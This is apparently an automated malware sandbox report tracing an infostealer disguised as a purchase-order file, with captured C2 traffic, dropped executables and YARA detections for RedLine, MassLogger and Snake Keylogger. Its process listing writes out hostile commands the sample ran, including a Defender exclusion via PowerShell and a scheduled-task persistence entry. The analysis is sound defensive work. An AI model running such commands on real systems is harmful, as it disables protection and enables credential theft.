                                                                                                                                                                                                    Nov 22, 2024 18:57:04.871248007 CET778OUTData Raw: 41 9d 8e db 05 08 6d 27 fe 02 00 00 79 5b fb e9 a6 f1 0f b9 c6 9c 46 fa 2c dc 8c cb c2 9a 38 a8 29 45 db 30 61 9c 93 a3 03 29 22 38 ae 15 41 64 fe 27 c7 2a a2 23 51 40 22 ec b6 09 65 07 9a 63 7e 07 6d e4 d8 e7 69 01 68 2a 56 a3 08 95 76 39 f8 4a
                                                                                                                                                                                                    Data Ascii: Am'y[F,8)E0a)"8Ad'*#Q@"ec~mih*Vv9JG\j_QZ=S\Z^ r?B?B h@3*D=b@>NB1@4~sSzE)TsWn{@v@gURMk'vt+5hi
                                                                                                                                                                                                    Nov 22, 2024 18:57:06.344959021 CET408INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Fri, 22 Nov 2024 17:57:06 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Set-Cookie: btst=31e4cc518641e053c0d572e33debcee2|8.46.123.75|1732298226|1732298226|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    0192.168.2.549712104.21.67.1524434324C:\Users\user\AppData\Local\Temp\server01.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2024-11-22 17:55:13 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    2024-11-22 17:55:13 UTC857INHTTP/1.1 200 OK
                                                                                                                                                                                                    Date: Fri, 22 Nov 2024 17:55:13 GMT
                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                    Content-Length: 361
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                    Age: 262022
                                                                                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X%2B1Z70tY7ASNmYyVU2Yt3bkbT9O4Xk%2BbrpEsQYn4DR16w%2F1ftyWFKsQIND1d7Iundz2nzqZTh4oEod%2FvX4eCHmh3DXgyb39%2BQAEv9AsdMOplvRGoHR0kMrxfMVWZgy%2BFigERYJb4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                    CF-RAY: 8e6aca080b5a0f89-EWR
                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1571&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1893644&cwnd=235&unsent_bytes=0&cid=f667429b980d98f8&ts=476&x=0"
                                                                                                                                                                                                    2024-11-22 17:55:13 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                                                                    Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                    Start time:12:54:58
                                                                                                                                                                                                    Start date:22/11/2024
                                                                                                                                                                                                    Path:C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe"
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:1'851'904 bytes
                                                                                                                                                                                                    MD5 hash:33FFA6B9A3022156B4592E17F1A9A074
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                    Start time:12:54:59
                                                                                                                                                                                                    Start date:22/11/2024
                                                                                                                                                                                                    Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:1'290'240 bytes
                                                                                                                                                                                                    MD5 hash:C427B6CE66EA0E5D2D3325158244AE4D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                    Start time:12:54:59
                                                                                                                                                                                                    Start date:22/11/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\System32\alg.exe
                                                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                                                    File size:1'225'728 bytes
                                                                                                                                                                                                    MD5 hash:DA0B96A9E5E0F99A5EF268C07A1A1025
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                    Start time:12:55:00
                                                                                                                                                                                                    Start date:22/11/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\drivers\AppVStrm.sys
                                                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                                                    Commandline:
                                                                                                                                                                                                    Imagebase:
                                                                                                                                                                                                    File size:138'056 bytes
                                                                                                                                                                                                    MD5 hash:BDA55F89B69757320BC125FF1CB53B26
                                                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                    Start time:12:55:00
                                                                                                                                                                                                    Start date:22/11/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\drivers\AppvVemgr.sys
                                                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                                                    Commandline:
                                                                                                                                                                                                    Imagebase:
                                                                                                                                                                                                    File size:174'408 bytes
                                                                                                                                                                                                    MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
                                                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                    Start time:12:55:00
                                                                                                                                                                                                    Start date:22/11/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\drivers\AppvVfs.sys
                                                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                                                    Commandline:
                                                                                                                                                                                                    Imagebase:
                                                                                                                                                                                                    File size:154'952 bytes
                                                                                                                                                                                                    MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
                                                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                    Start time:12:55:00
                                                                                                                                                                                                    Start date:22/11/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\AppVClient.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\AppVClient.exe
                                                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                                                    File size:1'348'608 bytes
                                                                                                                                                                                                    MD5 hash:C694BB2A60BDA8FD88F36DC094FF6DB0
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                    Start time:12:55:00
                                                                                                                                                                                                    Start date:22/11/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe"
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:1'851'904 bytes
                                                                                                                                                                                                    MD5 hash:33FFA6B9A3022156B4592E17F1A9A074
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000008.00000002.2100925791.00000000048A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                    Start time:12:55:01
                                                                                                                                                                                                    Start date:22/11/2024
                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe"
                                                                                                                                                                                                    Imagebase:0x40000
                                                                                                                                                                                                    File size:45'984 bytes
                                                                                                                                                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                    Start time:12:55:02
                                                                                                                                                                                                    Start date:22/11/2024
                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                                                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                                                    File size:2'354'176 bytes
                                                                                                                                                                                                    MD5 hash:F691545D151C73AC2F1C8FC3F6553944
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                    Start time:12:55:02
                                                                                                                                                                                                    Start date:22/11/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe"
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:1'851'904 bytes
                                                                                                                                                                                                    MD5 hash:33FFA6B9A3022156B4592E17F1A9A074
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000B.00000002.2130937070.00000000048A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                                    Start time:12:55:03
                                                                                                                                                                                                    Start date:22/11/2024
                                                                                                                                                                                                    Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                                                    File size:1'356'800 bytes
                                                                                                                                                                                                    MD5 hash:27652B586B1E4F9793415650BFFAE22A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                                    Start time:12:55:04
                                                                                                                                                                                                    Start date:22/11/2024
                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe"
                                                                                                                                                                                                    Imagebase:0x630000
                                                                                                                                                                                                    File size:45'984 bytes
                                                                                                                                                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000002.2136041654.0000000002711000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000D.00000002.2133035996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000002.2137004258.0000000002A50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000002.2139311354.0000000003C95000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000D.00000002.2137350892.0000000002B90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                    Start time:12:55:06
                                                                                                                                                                                                    Start date:22/11/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                                                                                                                                                                                                    Imagebase:0x170000
                                                                                                                                                                                                    File size:70'656 bytes
                                                                                                                                                                                                    MD5 hash:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                                    Start time:12:55:06
                                                                                                                                                                                                    Start date:22/11/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\server01.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\server01.exe"
                                                                                                                                                                                                    Imagebase:0xe40000
                                                                                                                                                                                                    File size:98'304 bytes
                                                                                                                                                                                                    MD5 hash:0CDBE0CD3CB5C2F0B2CB17E4417D43F5
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp, Author: unknown
                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3330930022.0000000003263000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Joe Security
                                                                                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: unknown
                                                                                                                                                                                                    • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\server01.exe, Author: Florian Roth
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:16
                                                                                                                                                                                                    Start time:12:55:08
                                                                                                                                                                                                    Start date:22/11/2024
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                                                                                                                                                                                                    Imagebase:0x70000
                                                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                                    Start time:12:55:08
                                                                                                                                                                                                    Start date:22/11/2024
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:00 /du 23:59 /sc daily /ri 1 /f
                                                                                                                                                                                                    Imagebase:0x9e0000
                                                                                                                                                                                                    File size:187'904 bytes
                                                                                                                                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                                    Start time:12:55:08
                                                                                                                                                                                                    Start date:22/11/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:19
                                                                                                                                                                                                    Start time:12:55:08
                                                                                                                                                                                                    Start date:22/11/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                                    Start time:12:55:11
                                                                                                                                                                                                    Start date:22/11/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Grinnellia.vbs"
                                                                                                                                                                                                    Imagebase:0x7ff770950000
                                                                                                                                                                                                    File size:170'496 bytes
                                                                                                                                                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                                    Start time:12:55:11
                                                                                                                                                                                                    Start date:22/11/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                    Imagebase:0x7ff6ef0c0000
                                                                                                                                                                                                    File size:496'640 bytes
                                                                                                                                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:22
                                                                                                                                                                                                    Start time:12:55:12
                                                                                                                                                                                                    Start date:22/11/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe"
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:1'851'904 bytes
                                                                                                                                                                                                    MD5 hash:33FFA6B9A3022156B4592E17F1A9A074
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000016.00000002.2263738666.0000000004090000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:24
                                                                                                                                                                                                    Start time:12:55:15
                                                                                                                                                                                                    Start date:22/11/2024
                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe"
                                                                                                                                                                                                    Imagebase:0x4d0000
                                                                                                                                                                                                    File size:45'984 bytes
                                                                                                                                                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:26
                                                                                                                                                                                                    Start time:12:55:46
                                                                                                                                                                                                    Start date:22/11/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                                                                                                                                                                                                    Imagebase:0xee0000
                                                                                                                                                                                                    File size:665'670'656 bytes
                                                                                                                                                                                                    MD5 hash:8EBEFAB8EF46B9960EDB099737B0E1ED
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                      Execution Coverage:3.3%
                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:6.7%
                                                                                                                                                                                                      Signature Coverage:7.7%
                                                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                                                      Total number of Limit Nodes:73
